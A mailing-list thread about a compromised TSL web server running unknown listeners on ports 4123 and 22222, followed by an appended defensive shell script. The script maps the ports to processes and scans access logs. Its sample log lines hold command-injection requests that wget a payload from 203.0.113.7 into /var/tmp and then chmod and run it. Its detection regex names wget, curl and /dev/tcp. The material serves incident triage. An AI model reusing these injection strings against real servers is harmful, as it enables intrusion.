Barbara M. wrote:
> A friend who has an httpd server based on TSL 2.2 has received this
> mail:
>
> -------------------------------------------
> Subject: Your_host_have_been_attacked
>
> Your host have been attacked by pv script. Look on netstat -anp for
> process listen on 4123 port
>
> -------------------------------------------
>
> It tells me that there is a process listening on port 4123 and another on
> 22222. Stopping httpd and killing the process that owns the daemons seems
> to temporarily "solve" the problem.
> He said those processes are owned by httpd.
The actual script running on those ports would have been helpful...

> He is now busy rebuilding a new box to migrate the data to, so he asked
> me to collect info on the "pv script".
> Any hints?

Only to dissect the process: what file is it? Who owns it? (Likely httpd.)
Then dig into the logs to find what injected the script.

My guess: there is some common cgi-bin/php script on the box with a well
known security flaw. I see tons of requests for awstats, blog and whatnot
in my error_log each day. I in fact had a compromise by way of an old
awstats about a year ago... but the installed script didn't have much
elbow room, and was just installed to /var/tmp and run as httpd.

-- 
Morten
_______________________________________________
tsl-discuss mailing list
[email protected]
http://lists.trustix.org/mailman/listinfo/tsl-discuss
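Added example for this thread (not code from the original posts, from Trustix or from the "pv script" itself): a small triage script that does the two things Morten's reply asks for on a Linux box. It maps each listening port named in the notification (4123, 22222) to its PID, owner, binary, working directory and command line via /proc, and copies the binary out before anyone kills the process, since /proc/PID/exe disappears with it. It then scans an Apache-style access_log for requests to cgi-bin, awstats, .pl or .php paths that carry shell metacharacters or a download/chmod command in the query string, which is the usual shape of a web-script injection that drops something into /var/tmp. The port numbers, the evidence path under /root, the regex and the sample log lines are all assumptions or constructed for illustration; the regex is a generic heuristic, not a signature for any particular flaw. netstat -anp only shows PIDs for other users' processes when run as root.

```sh
#!/bin/sh
# Added triage helper for the tsl-discuss thread; not from the original posts.
# Assumes Linux with /proc, GNU coreutils, and netstat or ss on the box.

# Map a listening TCP port to its process and preserve the binary.
inspect_port() {
    port=$1
    if command -v netstat >/dev/null 2>&1; then
        # netstat -antp: col 4 = local addr, col 6 = state, col 7 = PID/Program
        pid=$(netstat -antp 2>/dev/null | awk -v p=":$port" \
              '$4 ~ p"$" && $6 == "LISTEN" { split($7, a, "/"); print a[1]; exit }')
    else
        # ss -ltnp: col 4 = local addr, pid=N inside the users:(...) field
        pid=$(ss -ltnp 2>/dev/null | awk -v p=":$port" \
              '$4 ~ p"$" { if (match($0, /pid=[0-9]+/)) print substr($0, RSTART+4, RLENGTH-4); exit }')
    fi
    if [ -z "$pid" ]; then
        echo "port $port: nothing listening (or not root)"
        return 1
    fi
    echo "port $port: pid $pid"
    echo "  owner: $(stat -c %U "/proc/$pid" 2>/dev/null)"
    echo "  exe:   $(readlink "/proc/$pid/exe")"   # "(deleted)" means the file was removed after start
    echo "  cwd:   $(readlink "/proc/$pid/cwd")"
    echo "  cmd:   $(tr '\0' ' ' < "/proc/$pid/cmdline")"
    # Copy the running binary before killing anything; hypothetical evidence path.
    cp "/proc/$pid/exe" "/root/evidence-port$port-pid$pid.bin" 2>/dev/null
}

# Heuristic: a CGI/PHP/Perl request whose URL also carries a pipe, semicolon,
# backtick, or a fetch/chmod/tmp-path fragment. Not tied to any specific flaw.
SUSPICIOUS_RE='"(GET|POST|HEAD) [^"]*(cgi-bin|awstats|\.php|\.pl)[^"]*(%7c|\||;|%3b|`|wget|curl|chmod|/var/tmp|/dev/tcp)'

# Print matching access_log lines from stdin.
suspicious_requests() {
    grep -Ei "$SUSPICIOUS_RE"
}

# Count matching lines from stdin (always prints a number, even 0).
count_suspicious() {
    grep -Eic "$SUSPICIOUS_RE" || true
}

# Unique client IPs behind the matches; these are the ones to block and pivot on.
attacker_ips() {
    suspicious_requests | awk '{ print $1 }' | sort -u
}

# Constructed sample log in Apache combined format (not real traffic).
SAMPLE_LOG='10.0.0.5 - - [12/Mar/2006:03:14:07 +0100] "GET /index.html HTTP/1.1" 200 1043 "-" "Mozilla/5.0"
10.0.0.9 - - [12/Mar/2006:03:14:09 +0100] "GET /cgi-bin/awstats.pl?configdir=%7cwget%20http://203.0.113.7/pv.txt%20-O%20/var/tmp/pv%7c HTTP/1.1" 200 512 "-" "Mozilla/4.0"
10.0.0.9 - - [12/Mar/2006:03:14:10 +0100] "GET /cgi-bin/awstats.pl?config=site HTTP/1.1" 404 287 "-" "Mozilla/4.0"
10.0.0.11 - - [12/Mar/2006:03:15:42 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 200 54 "-" "-"
10.0.0.9 - - [12/Mar/2006:03:16:00 +0100] "GET /cgi-bin/test.cgi?cmd=;chmod+755+/var/tmp/pv;/var/tmp/pv HTTP/1.1" 200 12 "-" "Mozilla/4.0"'

# On a real box: suspicious_requests < /var/log/httpd/access_log
printf '%s\n' "$SAMPLE_LOG" | suspicious_requests
echo "suspicious requests: $(printf '%s\n' "$SAMPLE_LOG" | count_suspicious)"
echo "sources: $(printf '%s\n' "$SAMPLE_LOG" | attacker_ips | tr '\n' ' ')"
for port in 4123 22222; do
    inspect_port "$port" || :
done
```

Run it as root on the compromised host before httpd is stopped or the listeners are killed: the /proc view and the copied binary are what tells you whether it is a Perl script, a prebuilt bot, or something else, and the access_log matches (with their timestamps and source IPs) usually point straight at the vulnerable script that let it in. The two lines the sample flags are the awstats request with a piped wget into /var/tmp and the follow-up that chmods and runs the dropped file; the plain awstats config request and the xmlrpc.php POST do not match, which is the point of requiring a metacharacter or command fragment, not just a hit on a CGI path.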
